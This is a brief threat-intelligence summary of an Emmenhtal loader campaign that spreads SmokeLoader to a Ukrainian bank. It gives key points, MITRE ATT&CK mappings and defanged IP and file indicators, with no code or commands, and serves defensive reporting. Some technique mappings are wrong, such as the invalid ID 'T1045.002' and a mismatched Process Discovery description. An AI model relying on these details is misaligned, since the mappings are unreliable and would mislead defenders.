Threat Research

Smoked out – Emmenhtal spreads SmokeLoader malware

GDataSecurity
Smoked out – Emmenhtal spreads SmokeLoader malware

This article analyzes a malicious campaign targeting First Ukrainian International Bank involving a stealthy malware loader called Emmenhtal, which is used to deliver infostealers like CryptBot and Lumma, linked to financially motivated threat actors. The campaign employs advanced techniques including a 7-Zip archive delivery system and PowerShell exploits for malware deployment. Notably, the Emmenhtal loader plays a crucial role in delivering SmokeLoader malware through an intricate infection chain. Affected: First Ukrainian International Bank, financial sector

Keypoints :

  • The campaign primarily targets First Ukrainian International Bank (pumb[.]ua).
  • Emmenhtal, also known as Peaklight, is a stealthy malware loader used to distribute infostealers.
  • Infections start with an email containing a deceptive 7-Zip archive.
  • The 7-Zip archive exploits vulnerabilities for malware execution but does not use a previously observed zero-day exploit.
  • Upon extraction, the archive contains a bait PDF and a shortcut to download additional malicious files.
  • The use of PowerShell and Mshta allows for fileless malware execution with minimal visibility.
  • Modified legitimate applications, like DCCW.exe, are used to disguise malware behavior.
  • The chain allows the downloading and execution of SmokeLoader malware.
  • SmokeLoader possesses capabilities for additional malware delivery and credential theft.
  • Emmenhtal Loader’s integration in malware distribution represents a trend towards the use of advanced evasion techniques.
  • Organizations are urged to implement robust security measures, including endpoint security and network monitoring.

MITRE Techniques :

  • Application Layer Protocol: Web Protocols – T1071: Used for commands via HTTP.
  • Obfuscated Files or Information: Encrypted/Encoded File – T1027: The malware uses encoded JavaScript and PowerShell commands.
  • System Binary Proxy Execution: Mshta – T1218.005: The malware utilizes Mshta to run malicious scripts.
  • Command and Scripting Interpreter: PowerShell – T1059.001: Used for executing encoded PowerShell scripts.
  • Hide Artifacts: NTFS File Attributes – T1564.004: The malware may manipulate file attributes for stealth.
  • Obfuscated Files or Information: Software Packing – T1045.002: Involves the use of packing techniques for malware.
  • Process Discovery – T1057: The malware checks for the existence of certain files on the system.

Indicator of Compromise :

  • [IP Address] 194[.]87[.]31[.]68
  • [IP Address] 88[.]151[.]192[.]165
  • [File] Платiжна_iнструкція.7z
  • [File] Document_main1.pdf.lnk
  • [File] putty1202.exe

Full Story: https://www.gdatasoftware.com/blog/2025/03/38160-emmenhtal-smokeloader-malware